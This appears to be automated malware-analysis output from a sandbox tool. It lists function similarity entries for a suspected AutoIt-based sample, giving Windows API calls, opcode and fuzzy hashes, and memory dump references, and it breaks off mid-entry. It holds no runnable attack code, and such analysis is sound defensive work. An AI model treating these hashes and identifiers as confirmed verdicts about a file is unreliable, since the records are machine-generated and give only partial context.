                                                                                  Similarity
                                                                                  • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 1597257046-0
                                                                                  • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                  • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                  • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                  • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                  • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                  • String ID:
                                                                                  • API String ID: 237123855-0
                                                                                  • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                  • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                                  • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                  • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteDestroyObject$IconWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3349847261-0
                                                                                  • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                  • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                  • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                  • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                  • String ID:
                                                                                  • API String ID: 2223660684-0
                                                                                  • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                  • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                  • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                  • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                  APIs
                                                                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                  • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                  • EndPath.GDI32(?), ref: 00447336
                                                                                  • StrokePath.GDI32(?), ref: 00447344
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                  • String ID:
                                                                                  • API String ID: 2783949968-0
                                                                                  • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                  • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                  • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                  • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                  APIs
                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                  • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2710830443-0
                                                                                  • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                  • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                  • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                  • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                  • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                    • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                    • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                  • String ID:
                                                                                  • API String ID: 146765662-0
                                                                                  • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                  • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                  • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                  • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                  APIs
                                                                                  • GetDesktopWindow.USER32 ref: 00472B63
                                                                                  • GetDC.USER32(00000000), ref: 00472B6C
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2889604237-0
                                                                                  • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                  • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                  • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                  • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                                  APIs
                                                                                  • GetDesktopWindow.USER32 ref: 00472BB2
                                                                                  • GetDC.USER32(00000000), ref: 00472BBB
                                                                                  • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2889604237-0
                                                                                  • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                  • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                                  • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                  • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                                  APIs
                                                                                  • __getptd_noexit.LIBCMT ref: 00415150
                                                                                    • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                                    • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                                    • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                                    • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                                    • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                                  • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                                  • __freeptd.LIBCMT ref: 0041516B
                                                                                  • ExitThread.KERNEL32 ref: 00415173
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 1454798553-0
                                                                                  • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                  • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                                  • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                  • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strncmp
                                                                                  • String ID: Q\E
                                                                                  • API String ID: 909875538-2189900498
                                                                                  • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                  • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                                  • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                  • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                                  APIs
                                                                                  • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                    • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                    • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                    • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                                  • String ID: AutoIt3GUI$Container
                                                                                  • API String ID: 2652923123-3941886329
                                                                                  • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                  • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                                  • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                  • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove_strncmp
                                                                                  • String ID: U$\
                                                                                  • API String ID: 2666721431-100911408
                                                                                  • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                  • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                                  • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                  • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                                  APIs
                                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                  • __wcsnicmp.LIBCMT ref: 00467288
                                                                                  • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                  • String ID: LPT
                                                                                  • API String ID: 3035604524-1350329615
                                                                                  • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                  • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                                  • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                  • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID: \$h
                                                                                  • API String ID: 4104443479-677774858
                                                                                  • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                  • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                                  • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
